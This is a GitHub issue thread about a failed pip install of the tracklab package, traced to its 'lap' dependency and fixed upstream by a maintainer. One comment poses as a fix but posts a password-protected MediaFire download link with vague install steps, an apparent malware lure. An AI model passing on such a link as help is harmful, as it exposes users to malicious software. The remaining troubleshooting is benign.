### ISSUE TITLE
Error during installation

### ISSUE THREAD

**Issue by v-i-s-h** [TrackingLaboratory/tracklab#15]
Hi, I am trying to install this package following the instructions in README. I am using conda to setup the environment. Upon running `pip install -e .`, I am getting the following error
```bash
$ pip install -e .
Obtaining file:///home/v-i-s-h/repos/soccernet/tracklab
  Installing build dependencies ... done
  Checking if build backend supports build_editable ... done
  Getting requirements to build editable ... done
  Preparing editable metadata (pyproject.toml) ... done
Collecting lap@ git+https://github.com/TrackingLaboratory/lap (from tracklab==1.1.2)
  Cloning https://github.com/TrackingLaboratory/lap to /tmp/pip-install-0577k4ds/lap_16ac25cc32144c4a9353bbf79357c4fb
  Running command git clone --filter=blob:none --quiet https://github.com/TrackingLaboratory/lap /tmp/pip-install-0577k4ds/lap_16ac25cc32144c4a9353bbf79357c4fb
  Resolved https://github.com/TrackingLaboratory/lap to commit b02b664623fdfef5fd822b8ee0d1b2491ab945ed
  Installing build dependencies ... done
  Getting requirements to build wheel ... done
  Preparing metadata (pyproject.toml) ... error
  error: subprocess-exited-with-error

  × Preparing metadata (pyproject.toml) did not run successfully.
  │ exit code: 1
  ╰─> [31 lines of output]
      <string>:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
      <string>:222: DeprecationWarning:

        `numpy.distutils` is deprecated since NumPy 1.23.0, as a result
        of the deprecation of `distutils` itself. It will be removed for
        Python >= 3.12. For older Python versions it will remain present.
        It is recommended to use `setuptools < 60.0` for those Python versions.
        For more details, see:
          https://numpy.org/devdocs/reference/distutils_status_migration.html


      Traceback (most recent call last):
        File "/home/v-i-s-h/.conda/envs/soccernet/lib/python3.10/site-packages/pip/_vendor/pyproject_hooks/_in_process/_in_process.py", line 353, in <module>
          main()
        File "/home/v-i-s-h/.conda/envs/soccernet/lib/python3.10/site-packages/pip/_vendor/pyproject_hooks/_in_process/_in_process.py", line 335, in main
          json_out['return_val'] = hook(**hook_input['kwargs'])
        File "/home/v-i-s-h/.conda/envs/soccernet/lib/python3.10/site-packages/pip/_vendor/pyproject_hooks/_in_process/_in_process.py", line 149, in prepare_metadata_for_build_wheel
          return hook(metadata_directory, config_settings)
        File "/tmp/pip-build-env-ze41pykn/overlay/lib/python3.10/site-packages/setuptools/build_meta.py", line 373, in prepare_metadata_for_build_wheel
          self.run_setup()
        File "/tmp/pip-build-env-ze41pykn/overlay/lib/python3.10/site-packages/setuptools/build_meta.py", line 318, in run_setup
          exec(code, locals())
        File "<string>", line 235, in <module>
        File "<string>", line 222, in setup_package
        File "/tmp/pip-build-env-ze41pykn/overlay/lib/python3.10/site-packages/numpy/distutils/core.py", line 24, in <module>
          from numpy.distutils.command import config, config_compiler, \
        File "/tmp/pip-build-env-ze41pykn/overlay/lib/python3.10/site-packages/numpy/distutils/command/config.py", line 19, in <module>
          from numpy.distutils.mingw32ccompiler import generate_manifest
        File "/tmp/pip-build-env-ze41pykn/overlay/lib/python3.10/site-packages/numpy/distutils/mingw32ccompiler.py", line 27, in <module>
          from distutils.msvccompiler import get_build_version as get_build_msvc_version
      ModuleNotFoundError: No module named 'distutils.msvccompiler'
      [end of output]

  note: This error originates from a subprocess, and is likely not a problem with pip.
error: metadata-generation-failed

× Encountered error while generating package metadata.
╰─> See above for output.

note: This is an issue with the package mentioned above, not pip.
hint: See above for details.
```

OS: Ubuntu 20.04
All other packages are exactly same version as mentioned in the README.

How to fix this?

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by v-i-s-h** [comment]
Seems like the error is coming from `lap` package. I was able to resolve this issue and install tracklab by
1. Close `lap` and follow the install instructions in that README (Just do `python setup.py build`  and `python setup.py install`)
2. Comment out `lap` dependency from `tracklab` pyproject.toml and follow the normal install instructions

Is there any way to incorporate this into `tracklab`'s installation itself?

**Comment by victorjoos** [comment]
Hi @v-i-s-h !

Which version of python and numpy are you using ? I just tried to install it again from scratch and I can't reproduce this on python 3.10.5 and numpy  1.26.4 . 

In addition, could you try the "poetry way" ? We're more and more focusing on poetry because it allows us to lock dependencies more precisely, and this allows better control (and fewer installation errors)

Thanks !

**Comment by victorjoos** [comment]
This is solved by updating lap in trackinglaboratory/lap@6ec997b . You can try again to `pip install -e .` . If this issue persist for you, you might want to try `pip install -e . --no-cache-dir` or creating a new conda virtual environment, but it shouldn't be necessary.

**Comment by v-i-s-h** [comment]
Thanks! I can confirm that this is working.
